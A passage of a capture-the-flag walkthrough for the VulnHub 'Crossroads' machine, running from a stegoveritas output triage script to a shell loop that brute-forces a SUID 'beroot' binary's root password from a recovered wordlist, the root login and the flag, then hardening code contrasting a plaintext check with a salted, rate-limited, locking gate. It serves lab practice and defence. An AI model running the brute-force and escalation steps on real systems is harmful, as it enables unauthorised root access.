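    """Classify every blob; a zlib chunk is also classified by what it inflates to."""
    report = {}
    for name, data in blobs.items():
        kind = classify_blob(data)
        if kind == "zlib":
            inner = inflate_if_zlib(data)
            if inner is not None:
                kind = "zlib->" + classify_blob(inner)
        report[name] = kind
    return report


# Constructed stand-ins for the files stegoveritas left in results/keepers.
SAMPLE_BLOBS = {
    "1668605632-wordlist": b"letmein\npassword1\n___example___\nqwerty\n",
    "29.zlib": zlib.compress(b"\x89PNG\r\n\x1a\n" + bytes(range(256)) * 4),
    "1668605635-chunk": bytes(range(256)),
}

if __name__ == "__main__":
    for name, kind in triage(SAMPLE_BLOBS).items():
        print(f"{name}: {kind}")
```

Run it against a real keepers directory by loading each file into the dict with `open(path, "rb").read()`; anything labelled `wordlist` is the candidate to inspect, and `zlib->binary` chunks are usually image data rather than hidden payload.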

┌──(kali㉿kali)-[~/Vulnhub/Crossroads/results/keepers]
└─$ mv 1668605632.515148-acdbbd842fee9302ae4de398d1ab2300 passlist

┌──(kali㉿kali)-[~/Vulnhub/Crossroads/results/keepers]
└─$ ls
1668605635.4692078-cdaac7888d6459d35735a7a017745968  1668605655.8980753-4aef70b7df286874d7f5bf43305de4bb  1668605659.3538682-7aabde43efa4d275e91debe133aa8673  1668605679.751733-f925d60b59b4b1cb85922e3b7efcbcde
1668605652.915446-dce62c225527f62f593c71e9fdfbe765   1668605657.028825-c3d9ec0541be0e353038bbaa263d8406   1668605661.0991077-b893f2c01edf8bb4d21bb2ce9c510156  29
1668605654.491967-2c2e9e198566dca626c518c23661cabc   1668605657.3429148-c0d183c52e81f473c0daafe50e0eece4  1668605662.0214634-f5b1ded00bfad7d6160891ff386379c1  29.zlib
1668605655.125798-bcffc227ec961d9a422307bc56aa9f80   1668605658.7701492-c264536d7e1bbac0e84d7561bd46aacd  1668605662.1177938-deacfe6927ff1e957b146f28457567cf  passlist

┌──(kali㉿kali)-[~/Vulnhub/Crossroads/results/keepers]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.56.181 - - [16/Nov/2022 08:46:38] "GET /passlist HTTP/1.1" 200 -

albert@crossroads:/home/albert$ ls
ls
beroot  crossroads.png  passlist  smbshare  user.txt
albert@crossroads:/home/albert$ ls -alh
ls -alh
total 1.9M
drwxr-xr-x 3 albert albert 4.0K Nov 16 07:46 .
drwxr-xr-x 3 root   root   4.0K Mar  2  2021 ..
-rwsr-xr-x 1 root   root    17K Mar  2  2021 beroot
-rw-r--r-- 1 albert albert 1.6M Mar  2  2021 crossroads.png
-rw-rw-rw- 1 albert albert 355K Nov 16 07:33 passlist
drwxrwxrwx 2 albert albert 4.0K Nov 16 07:10 smbshare
-r-x------ 1 albert albert 1.8K Jan  3  2021 user.txt
albert@crossroads:/home/albert$ 

The beroot binary has the SUID bit set and can be used for privilege escalation; running it prompts for the root password.

albert@crossroads:/home/albert$ ./beroot
./beroot
TERM environment variable not set.
enter password for root
-----------------------

password: dd
dd
wrong password!!!

So write a shell loop to brute-force the password against the wordlist:

# Read one candidate per line (no word splitting or globbing), feed it to beroot, print it, and hide the "wrong password" lines
while IFS= read -r pw; do printf '%s\n' "$pw" | ./beroot; echo "$pw"; done < passlist | grep -v wrong
albert@crossroads:/home/albert$ cat rootcreds
cat rootcreds
root
___drifting___
albert@crossroads:/home/albert$ su - root
su - root
Password: ___drifting___

root@crossroads:~# cd /root
cd /root
root@crossroads:~# ls 
ls 
beroot.sh  creds  passwd  root.txt
root@crossroads:~# cat root.txt
cat root.txt
flag 2/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█

congratulations!

root@crossroads:~# 

The root flag was obtained successfully.
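What made the beroot step above work is that the binary compares a plaintext password read from stdin and can be invoked as often as the wordlist is long, with no delay or lockout. The following is an added example, not code from the original writeup or from the Crossroads VM, that puts that weak pattern beside a hardened password gate: a salted PBKDF2 verifier instead of a stored plaintext, a constant-time comparison, an exponential delay on failure and a lockout after a fixed number of attempts. The secret, salt and four-word list are constructed; `sleep` is injectable so the lockout can be exercised without waiting.

```python
import hashlib
import hmac
import time
from typing import Callable, Iterable, Tuple

# Constructed demo values; not the credential or wordlist from the machine.
DEMO_PASSWORD = "correct-horse-battery"
DEMO_SALT = b"constructed-demo-salt"
PBKDF2_ROUNDS = 50_000


def make_verifier(password: str, salt: bytes = DEMO_SALT) -> bytes:
    """Store a slow, salted hash of the password rather than the plaintext."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


class WeakGate:
    """The pattern the brute force relies on: instant, unlimited plaintext equality."""

    def __init__(self, secret: str):
        self.secret = secret

    def check(self, candidate: str) -> bool:
        return candidate == self.secret


class HardenedGate:
    """Hashed verifier, constant-time compare, growing delay, and lockout."""

    def __init__(self, verifier: bytes, salt: bytes = DEMO_SALT,
                 max_attempts: int = 3, base_delay: float = 1.0,
                 sleep: Callable[[float], None] = time.sleep):
        self.verifier = verifier
        self.salt = salt
        self.max_attempts = max_attempts
        self.base_delay = base_delay
        self.sleep = sleep
        self.failures = 0
        self.locked = False

    def check(self, candidate: str) -> bool:
        if self.locked:
            return False
        digest = hashlib.pbkdf2_hmac("sha256", candidate.encode(), self.salt, PBKDF2_ROUNDS)
        # compare_digest does not leak how many leading bytes matched.
        if hmac.compare_digest(digest, self.verifier):
            self.failures = 0
            return True
        self.failures += 1
        # Each failure doubles the wait: 1s, 2s, 4s, ...
        self.sleep(self.base_delay * 2 ** (self.failures - 1))
        if self.failures >= self.max_attempts:
            self.locked = True
        return False


def run_wordlist(gate, words: Iterable[str]) -> Tuple[bool, int]:
    """Feed candidates to a gate the way the loop above does; return (cracked, attempts)."""
    attempts = 0
    for word in words:
        if getattr(gate, "locked", False):
            break
        attempts += 1
        if gate.check(word):
            return True, attempts
    return False, attempts


WORDLIST = ["letmein", "password1", "qwerty", DEMO_PASSWORD]

if __name__ == "__main__":
    print("weak gate:", run_wordlist(WeakGate(DEMO_PASSWORD), WORDLIST))
    gate = HardenedGate(make_verifier(DEMO_PASSWORD), sleep=lambda s: None)
    print("hardened gate:", run_wordlist(gate, WORDLIST), "locked:", gate.locked)
```

One caveat for a SUID binary specifically: the loop in the writeup starts a fresh process per candidate, so the failure delay still costs the attacker wall-clock time per attempt, but an in-memory counter like `failures` resets every run. A real implementation has to keep that counter outside the process (a root-owned state file, or delegating the check to PAM, which already provides faillock-style lockout) for the lockout to mean anything.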

Original article: http://www.cnblogs.com/jason-huawen/p/16897851.html
